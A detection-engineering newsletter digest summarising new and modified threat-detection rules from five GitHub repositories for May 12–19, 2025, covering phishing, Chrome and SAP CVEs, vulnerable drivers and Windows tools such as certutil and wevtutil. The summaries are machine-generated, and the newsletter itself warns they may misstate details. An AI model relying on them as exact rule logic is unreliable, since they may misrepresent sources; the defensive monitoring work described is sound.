This week's (horribly delayed 😓) issue highlights the most significant changes to detection rules from 5 of the 40+ monitored GitHub repositories. Between May 12 and May 19, 2025, contributors added 16 new rules and updated 34 existing ones.

Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

Focus on brand and credential phishing — New rules address various phishing techniques using platforms like Zoom, Ludus, Scribd, and Google Docs, each targeting credential theft and requiring advanced link and language analysis to flag suspicious activities (sublime-security/sublime-rules).

Enhanced Chrome vulnerability detection — Specific focus on CVE-2025-4664 with rules targeting both the presence of vulnerable Chrome versions and potential exploitation involving critical identities, indicates a proactive approach to securing browser-related vulnerabilities (SlimKQL/Hunting-Queries-Detection-Rules).

Cloud platform monitoring focus — Addition of rules to detect unauthorized bot activity within Microsoft 365, specifically through Copilot shared agents. This highlights the trend of closely monitoring cloud service abuse and unauthorized access patterns (SlimKQL/Hunting-Queries-Detection-Rules).

Malicious driver detection updates — Maintaining and expanding coverage of malicious and vulnerable driver loads emphasizing modifications in hash values and driver names for better scope and accuracy. (magicsword-io/LOLDrivers).

Advanced use of modern search techniques — Widespread adoption of efficiency improvements using tstats, join, and regex in Splunk detection rules to improve performance and reduce false positives. This trend shows an organizational push for optimization and accuracy (splunk/security_content).

Ransomware and file manipulation focus — Detection rules now include specific techniques like identifying Windows Event Log clearing via Wevtutil, fsutil zeroing files, and detecting file downloads via CertUtil to combat ransomware activities and unauthorized data tampering (splunk/security_content).

Newly added critical SAP and Cisco Firewall rules — Attention is given to detecting specific threat activities like SAP NetWeaver exploitation and Snort signature-triggered intrusion events with Cisco Firewalls, focusing on identifying targeted attacks and zero-day exploits (splunk/security_content).

Table Of Contents

• Corporate repositories (4)

  • sublime-security/sublime-rules (+5, ✎6)

  • SigmaHQ/sigma (✎1)

  • magicsword-io/LOLDrivers (✎6)

  • splunk/security_content (+7, ✎21)

• Personal repositories (1)

  • SlimKQL/Hunting-Queries-Detection-Rules (+4)

• Feedback

• Disclaimer

• Powered by

📢 This week there is no STIX2 bundle with the new rules, as we’re building a new capability for sharing the rules and, unfortunately, it’s not ready yet. Stay tuned!

Corporate repositories (4)

sublime-security/sublime-rules (+5, ✎6)

https://github.com/sublime-security/sublime-rules

+ New rules

Two new multi-stage phishing detection rules have been implemented. The first focuses on credential phishing via Google Docs, analyzing links and text content for redirect patterns and suspicious domains. The second analyzes Scribd documents for similar threats, targeting Microsoft services and using natural language and HTML analysis. Both rules employ domain trust evaluation and DMARC authentication methods (Link: Multistage Landing - Published Google Doc, Link: Multistage Landing - Scribd Document).

Updates include the introduction of a rule for identifying Zoom brand impersonation. This rule checks messages for fake Zoom branding through analysis of social footers, webinar links, and content patterns (Brand Impersonation: Zoom).

Two rules target credential theft via links in presentations and documents. The first tracks Ludus presentations used for phishing, examining links, embedded content, and sender trust. The second rule monitors Scribd fullscreen links from unknown senders, using URL and sender analysis to detect phishing attempts (Link: Multistage Landing - Ludus Presentation, Link: Scribd Fullscreen Link From Suspicious Sender).

✎ Modified rules

The rule "EML attachment with credential theft language (unknown sender)" was updated for improved sender email profiling accuracy by switching to profile.by_sender_email(), and modified false positive handling was changed to any_messages_benign to better differentiate messages, (EML attachment with credential theft language (unknown sender)).

The rule "Vendor Compromise: GovDelivery Message With Suspicious Link" now includes legistar1.com in the list of known good domains, acknowledging its association with Granicus, (Vendor Compromise: GovDelivery Message With Suspicious Link).

The rule "Fake email quarantine notification" has been updated with new keywords incoming and recover, increasing its detection capability for phishing attempts posing as quarantine notifications, (Fake email quarantine notification).

The "Corporate Services Impersonation Phishing" rule now includes a pattern for detecting HR-related admin subjects in emails, improving coverage for detection of HR impersonation phishing attempts, (Corporate Services Impersonation Phishing).

The rule "Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern" was adjusted to better handle sender-recipient email matches, update trusted domain logic, refine recipient contact history checks, and exclude advertising topics from results, (Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern).

In the "Brand impersonation: DocuSign" rule, regex patterns for DocuSign message IDs were updated for accuracy, docusign.co.uk was added as legitimate, sadq.sa was excluded, and HTML parsing was standardized, (Brand impersonation: DocuSign).

📰 Cybersec Overview newsletter consolidates updates from 80+ sources: government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals.

Read the latest issue

SigmaHQ/sigma (✎1)

https://github.com/SigmaHQ/sigma

✎ Modified rules

A rule targeting potentially suspicious WDAC policy file creation was updated by adding a filter to exclude events when the Image is 'System', helping reduce false positives. References and modified date were also updated. (Potentially Suspicious WDAC Policy File Creation)

magicsword-io/LOLDrivers (✎6)

https://github.com/magicsword-io/LOLDrivers

✎ Modified rules

Several rules targeting driver loads were updated. The "Malicious Driver Load By Name" rule was modified by updating the list of driver names in its logic. The "Vulnerable Driver Load By Name" rule expanded its scope by adding new filenames for potentially vulnerable drivers. ( Malicious Driver Load By Name, Vulnerable Driver Load By Name )

Multiple rules involving hash detections saw updates. The "Vulnerable Driver Load" rule has new MD5 hashes for better coverage. Similarly, "Vulnerable Driver Load Despite HVCI" and "Malicious Driver Load Despite HVCI" rules were updated by adding and removing hash values, maintaining detection relevance. The "Malicious Driver Load" rule updated its hashes to cover a broader range of threats. ( Vulnerable Driver Load, Vulnerable Driver Load Despite HVCI, Malicious Driver Load Despite HVCI, Malicious Driver Load )

splunk/security_content (+7, ✎21)

https://github.com/splunk/security_content

+ New rules

New rules detect three distinct types of Windows activities. These include instances of file downloads via certutil.exe, event log clearance using wevtutil, and recon activities utilizing tools like wevtutil, wmic, and PowerShell. Additionally, renamed PowerShell executions, which could be used to bypass security controls, are now tracked. These rules utilize process names, command-line arguments, and data from Endpoint Detection and Response (EDR) agents to enhance threat detection capabilities. (Windows File Download Via CertUtil, Windows Eventlog Cleared Via Wevtutil, Windows EventLog Recon Activity Using Log Query Utilities, Windows Renamed Powershell Execution)

New rule identifies exploitation attempts on SAP NetWeaver Visual Composer by monitoring HTTP HEAD or POST requests with a 200 OK status to specific endpoints. This addresses CVE-2025-31324, an unauthenticated file upload vulnerability. (SAP NetWeaver Visual Composer Exploitation Attempt)

MacOS AMOS Stealer detection tracks virtual machine check activity using osquery to monitor process events. It identifies execution of "osascript" with command-line arguments related to VMware or QEMU. (MacOS AMOS Stealer - Virtual Machine Check Activity)

Cisco Secure Firewall rule leverages IntrusionEvent logs to detect intrusion events related to known threat activities. It uses lookup tables to map Snort signature IDs to threat actors and techniques. (Cisco Secure Firewall - Intrusion Events by Threat Activity)

✎ Modified rules

Detection logic improvements were applied to rules targeting processes with no command-line arguments. These include the use of regex, joining network data, and refining queries for DLLHost, GPUpdate, Rundll32, and SearchProtocolHost. Enhancements are aimed at better identifying suspicious activity linked to these processes and their network interactions (DLLHost with no Command Line Arguments with Network, GPUpdate with no Command Line Arguments with Network, Rundll32 with no Command Line Arguments with Network, SearchProtocolHost with no Command Line with Network).

Detection rules for file manipulations and suspicious file activities received query enhancements. The rules, including those for Outlook and PowerShell activities, benefits from better correlation, reduced false positives, and higher efficiency (Detect Outlook exe writing a zip file, Fsutil Zeroing File, Java Writing JSP File, PowerShell Loading DotNET into Memory via Reflection, Spoolsv Writing a DLL, Suspicious Image Creation In Appdata Folder, Suspicious WAV file in Appdata Folder, Suspicious writes to windows Recycle Bin, Windows Phishing Outlook Drop Dll In FORM Dir).

Enhanced detection coverage has been applied for several specific scenarios including: registry deletions by unexpected processes, remote network connections, system processes from unexpected locations, and use of InstallUtil with network activity. These updates involve query optimizations and better data source integration (System Processes Run From Unexpected Locations, Unknown Process Using The Kerberos Protocol, Windows Defacement Modify Transcodedwallpaper File, Windows Deleted Registry By A Non Critical Process File Path, Windows InstallUtil Remote Network Connection, Windows InstallUtil Uninstall Option with Network, Windows Office Product Dropped Cab or Inf File, Windows WinLogon with Public Network Connection).

Personal repositories (1)

SlimKQL/Hunting-Queries-Detection-Rules (+4)

https://github.com/SlimKQL/Hunting-Queries-Detection-Rules

+ New rules

A new KQL rule detects vulnerable versions of Google Chrome associated with CVE-2025-4664, excluding version 136.0.7103.114. The rule counts and sorts the vulnerable versions found in DeviceProcessEvents, assisting in identifying wide-scale exposure within an organization (CVE-2025-4664 Chrome flaw with public exploit).

Another rule detects potential exploitation of the CVE-2025-4664 Chrome zero-day vulnerability on devices used by critical identities. It inspects versions using ExposureGraphNodes, ExposureGraphEdges, and DeviceProcessEvents, focusing on scenarios where critical users have administrative privileges (Critical identities with zero-day Chrome vulnerability).

A new rule identifies malicious social engineering attacks in Teams by analyzing external inbound messages containing URLs linked to known RMM tools. The rule excludes approved URLs to focus on suspicious activity, aiding in filtering out potential threats to communication platforms (Detecting Social Engineering Attacks in Teams with KQL).

The M365 Copilot Shared Agent rule monitors for bot creation or update activities by logging CloudAppEvents with action types 'BotCreate' and 'BotUpdateOperation-BotPublish'. The rule checks for unauthorized bot activity, potentially indicating a compromise in the M365 environment (Detecting M365 Copilot Shared Agent).

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.

Disclaimer

The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.